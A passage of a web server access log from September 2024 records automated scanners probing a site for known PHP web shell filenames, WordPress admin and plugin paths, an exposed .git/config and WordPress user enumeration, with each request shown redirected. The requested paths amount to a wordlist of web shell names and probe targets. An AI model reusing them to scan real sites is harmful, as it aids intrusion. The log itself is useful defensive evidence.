[12/Sep/2024:04:22:37 +0700] "GET /wp-init.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 104.248.174.117 - - [12/Sep/2024:04:22:40 +0700] "GET /blue.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 104.248.174.117 - - [12/Sep/2024:04:22:44 +0700] "GET /admin1.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 104.248.174.117 - - [12/Sep/2024:04:22:46 +0700] "GET /fast.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 104.248.174.117 - - [12/Sep/2024:04:22:47 +0700] "GET /ipt.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 104.248.174.117 - - [12/Sep/2024:04:22:50 +0700] "GET /wp-raze.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 104.248.174.117 - - [12/Sep/2024:04:22:52 +0700] "GET /foxwso.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 104.248.174.117 - - [12/Sep/2024:04:22:54 +0700] "GET /wp_backup.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 104.248.174.117 - - [12/Sep/2024:04:22:56 +0700] "GET /wp-one.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 104.248.174.117 - - [12/Sep/2024:04:22:58 +0700] "GET /wp-pluging.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 104.248.174.117 - - [12/Sep/2024:04:23:00 +0700] "GET /wp-mails.ph HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 104.248.174.117 - - [12/Sep/2024:04:23:02 +0700] "GET /wp-defaul.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 104.248.174.117 - - [12/Sep/2024:04:23:04 +0700] "GET /wp-blog.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 104.248.174.117 - - [12/Sep/2024:04:23:07 +0700] "GET /ah.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 104.248.174.117 - - [12/Sep/2024:04:23:10 +0700] "GET /m4r1ju4n4.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 104.248.174.117 - - [12/Sep/2024:04:23:12 +0700] "GET /aab.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 104.248.174.117 - - [12/Sep/2024:04:23:14 +0700] "GET /kuda.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 104.248.174.117 - - [12/Sep/2024:04:23:17 +0700] "GET /kii.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 104.248.174.117 - - [12/Sep/2024:04:23:19 +0700] "GET /wp.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 104.248.174.117 - - [12/Sep/2024:04:23:22 +0700] "GET /dxshell.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 104.248.174.117 - - [12/Sep/2024:04:23:24 +0700] "GET /main.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 104.248.174.117 - - [12/Sep/2024:04:23:26 +0700] "GET /xmrlpc.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 104.248.174.117 - - [12/Sep/2024:04:23:28 +0700] "GET /529.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 104.248.174.117 - - [12/Sep/2024:04:23:30 +0700] "GET /nshell.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 104.248.174.117 - - [12/Sep/2024:04:23:33 +0700] "GET /predator.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 104.248.174.117 - - [12/Sep/2024:04:23:38 +0700] "GET /zaco.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 104.248.174.117 - - [12/Sep/2024:04:23:39 +0700] "GET /small.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 104.248.174.117 - - [12/Sep/2024:04:23:42 +0700] "GET /b374k.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 104.248.174.117 - - [12/Sep/2024:04:23:43 +0700] "GET /cgi.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 104.248.174.117 - - [12/Sep/2024:04:23:47 +0700] "GET /owl.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 104.248.174.117 - - [12/Sep/2024:04:23:49 +0700] "GET /yuuki.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 104.248.174.117 - - [12/Sep/2024:04:23:51 +0700] "GET /yuki.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 104.248.174.117 - - [12/Sep/2024:04:23:53 +0700] "GET /spawn.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 104.248.174.117 - - [12/Sep/2024:04:23:54 +0700] "GET /puki.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 104.248.174.117 - - [12/Sep/2024:04:23:56 +0700] "GET /well.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 104.248.174.117 - - [12/Sep/2024:04:24:02 +0700] "GET /black.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 104.248.174.117 - - [12/Sep/2024:04:24:03 +0700] "GET /fatal.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 104.248.174.117 - - [12/Sep/2024:04:24:06 +0700] "GET /con.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 104.248.174.117 - - [12/Sep/2024:04:24:07 +0700] "GET /con7.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 104.248.174.117 - - [12/Sep/2024:04:24:11 +0700] "GET /dbx.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 104.248.174.117 - - [12/Sep/2024:04:24:12 +0700] "GET /dev.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 104.248.174.117 - - [12/Sep/2024:04:24:14 +0700] "GET /docindex.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 104.248.174.117 - - [12/Sep/2024:04:24:16 +0700] "GET /Dz.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 104.248.174.117 - - [12/Sep/2024:04:24:18 +0700] "GET /FoxWSO.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 104.248.174.117 - - [12/Sep/2024:04:24:19 +0700] "GET /gel4y.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 104.248.174.117 - - [12/Sep/2024:04:24:23 +0700] "GET /asu.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 199.45.155.89 - - [12/Sep/2024:05:31:32 +0700] "GET / HTTP/1.1" 301 162 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" 45.148.10.75 - - [12/Sep/2024:08:05:54 +0700] "GET /.git/config HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0" 79.137.71.22 - - [12/Sep/2024:10:11:42 +0700] "GET /wp-login.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0" 79.137.71.22 - - [12/Sep/2024:10:11:45 +0700] "GET ///?author=1 HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0" 79.137.71.22 - - [12/Sep/2024:10:11:48 +0700] "GET ///wp-json/wp/v2/users/ HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0" 165.22.53.58 - - [12/Sep/2024:13:27:44 +0700] "GET / HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36" 44.229.15.34 - - [12/Sep/2024:18:03:48 +0700] "GET /robots.txt HTTP/1.1" 301 162 "-" "Mozilla/5.0 (compatible; wpbot/1.1; +https://forms.gle/ajBaxygz9jSR8p8G9)" 205.210.31.181 - - [13/Sep/2024:06:59:26 +0700] "GET / HTTP/1.1" 301 162 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com" 157.245.149.177 - - [13/Sep/2024:14:12:02 +0700] "GET / HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36" 68.183.225.192 - - [13/Sep/2024:14:24:41 +0700] "GET / HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36" 152.42.169.222 - - [13/Sep/2024:17:02:37 +0700] "GET / HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36" 137.184.164.111 - - [13/Sep/2024:18:31:00 +0700] "GET / HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36" 51.15.16.101 - - [14/Sep/2024:19:51:47 +0700] "GET /wp-content/plugins/pwnd/pwnd.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 51.15.16.101 - - [14/Sep/2024:19:52:50 +0700] "GET /wp-content/plugins/pwnd-1/pwnd.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 51.15.16.101 - - [14/Sep/2024:19:53:09 +0700] "GET /wp-content/plugins/pwnd-2/pwnd.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 51.15.16.101 - - [14/Sep/2024:19:53:34 +0700] "GET /wp-content/plugins/fix/up.php HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 107.181.244.204 - - [14/Sep/2024:22:46:51 +0700] "GET / HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36" 68.183.188.107 - - [15/Sep/2024:08:09:02 +0700] "GET / HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36" 146.70.160.252 - - [15/Sep/2024:22:15:16 +0700] "GET /images/neko.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:76.0) Gecko/20100101 Firefox/76.0" 146.70.160.252 - - [15/Sep/2024:22:15:16 +0700] "GET /wp-admin/includes/class-custom-header.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" 146.70.160.252 - - [15/Sep/2024:22:15:16 +0700] "GET /wp-includes/wp-includes_function.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" 146.70.160.252 - - [15/Sep/2024:22:15:16 +0700] "GET /wp-includes/option-module.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.157 Safari/537.36" 146.70.160.252 - - [15/Sep/2024:22:15:17 +0700] "GET /wp-content/plugins/wp-theme-editor/include.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.125 Safari/537.36" 146.70.160.252 - - [15/Sep/2024:22:15:17 +0700] "GET /wp-content/plugins/index.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:73.0) Gecko/20100101 Firefox/73.0" 146.70.160.252 - - [15/Sep/2024:22:15:17 +0700] "GET /customize/atomlib.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:79.0) Gecko/20100101 Firefox/79.0" 146.70.160.252 - - [15/Sep/2024:22:15:17 +0700] "GET /js/tinymce/plugins/compat3x/css/wp-casper.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:67.0) Gecko/20100101 Firefox/67.0" 146.70.160.252 - - [15/Sep/2024:22:15:17 +0700] "GET /maint/shell.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Linux x86_64; rv:79.0) Gecko/20100101 Firefox/79.0" 146.70.160.252 - - [15/Sep/2024:22:15:18 +0700] "GET /class-wp-recovery-mode-email-service-meta.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:79.0) Gecko/20100101 Firefox/79.0" 146.70.160.252 - - [15/Sep/2024:22:15:18 +0700] "GET /js/tinymce/skins/lightgray/img/index.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:79.0) Gecko/20100101 Firefox/79.0" 146.70.160.252 - - [15/Sep/2024:22:15:18 +0700] "GET /js/plupload/moderation.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36" 146.70.160.252 - - [15/Sep/2024:22:15:18 +0700] "GET /index2313.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36" 146.70.160.252 - - [15/Sep/2024:22:15:18 +0700] "GET /plugins/ern/gawean.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" 146.70.160.252 - - [15/Sep/2024:22:15:19 +0700] "GET /maint/aj.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Linux i686; rv:79.0) Gecko/20100101 Firefox/79.0" 146.70.160.252 - - [15/Sep/2024:22:15:19 +0700] "GET /themes/pridmag/1.php?u HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Linux x86_64; rv:79.0) Gecko/20100101 Firefox/79.0" 146.70.160.252 - - [15/Sep/2024:22:15:19 +0700] "GET /settings.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36" 146.70.160.252 - - [15/Sep/2024:22:15:19 +0700] "GET /authorize.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3" 146.70.160.252 - - [15/Sep/2024:22:15:19 +0700] "GET /user/about.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36" 146.70.160.252 - - [15/Sep/2024:22:15:20 +0700] "GET /l/index.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36" 146.70.160.252 - - [15/Sep/2024:22:15:20 +0700] "GET /css/colors/blue/aclass.api.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.110 Safari/537.36" 146.70.160.252 - - [15/Sep/2024:22:15:20 +0700] "GET /offercodes.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3" 146.70.160.252 - - [15/Sep/2024:22:15:20 +0700] "GET /themes/finley/min.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.88 Safari/537.36" 146.70.160.252 - - [15/Sep/2024:22:15:20 +0700] "GET /uploads/autoload_classmap.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" 146.70.160.252 - - [15/Sep/2024:22:15:21 +0700] "GET /css/colors/xmrlpc.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36" 146.70.160.252 - - [15/Sep/2024:22:15:21 +0700] "GET /digital-download/new.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0" 146.70.160.252 - - [15/Sep/2024:22:15:21 +0700] "GET /ID3/getid.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3" 146.70.160.252 - - [15/Sep/2024:22:15:21 +0700] "GET /includes/class_api.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.157 Safari/537.36" 146.70.160.252 - - [15/Sep/2024:22:15:21 +0700] "GET /phpunit/phpunit/src/Util/PHP/MARIJUANA.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; rv:11.0) like Gecko" 146.70.160.252 - - [15/Sep/2024:22:15:22 +0700] "GET /plugins/upspy/index.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:73.0) Gecko/20100101 Firefox/73.0" 146.70.160.252 - - [15/Sep/2024:22:15:22 +0700] "GET /uploads/index.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.88 Safari/537.36" 146.70.160.252 - - [15/Sep/2024:22:15:22 +0700] "GET /plugins/apikey/wp-config-samples.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3" 146.70.160.252 - - [15/Sep/2024:22:15:22 +0700] "GET /themes/twentynineteen/inc/ty.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0" 146.70.160.252 - - [15/Sep/2024:22:15:23 +0700] "GET /js/tinymce/themes/wp-login.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:72.0) Gecko/20100101 Firefox/72.0" 146.70.160.252 - - [15/Sep/2024:22:15:23 +0700] "GET /includes/continents-cities-decryption.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36" 146.70.160.252 - - [15/Sep/2024:22:15:23 +0700] "GET /plugins/x/index.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; rv:11.0) like Gecko" 146.70.160.252 - - [15/Sep/2024:22:15:23 +0700] "GET /images/bless.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36" 146.70.160.252 - - [15/Sep/2024:22:15:23 +0700] "GET /customize/admin.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36" 146.70.160.252 - - [15/Sep/2024:22:15:24 +0700] "GET /plugins/index.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36" 146.70.160.252 - - [15/Sep/2024:22:15:24 +0700] "GET /codeboy1877_up.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" 146.70.160.252 - - [15/Sep/2024:22:15:24 +0700] "GET /plugins/seox/wsoyanzf.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.125 Safari/537.36" 146.70.160.252 - - [15/Sep/2024:22:15:24 +0700] "GET /class-wp-widget-private.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36" 146.70.160.252 - - [15/Sep/2024:22:15:24 +0700] "GET /source.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3" 146.70.160.252 - - [15/Sep/2024:22:15:25 +0700] "GET /ID3/lmfi.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36" 146.70.160.252 - - [15/Sep/2024:22:15:25 +0700] "GET /acme-challenge/index.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:77.0) Gecko/20100101 Firefox/77.0" 146.70.160.252 - - [15/Sep/2024:22:15:25 +0700] "GET /css/colors/blue/cloud.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36" 146.70.160.252 - - [15/Sep/2024:22:15:25 +0700] "GET /pomo/v2.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.110 Safari/537.36" 146.70.160.252 - - [15/Sep/2024:22:15:25 +0700] "GET /SimplePie/themes.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36" 146.70.160.252 - - [15/Sep/2024:22:15:26 +0700] "GET /allez.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36 OPR/70.0.3728.95" 146.70.160.252 - - 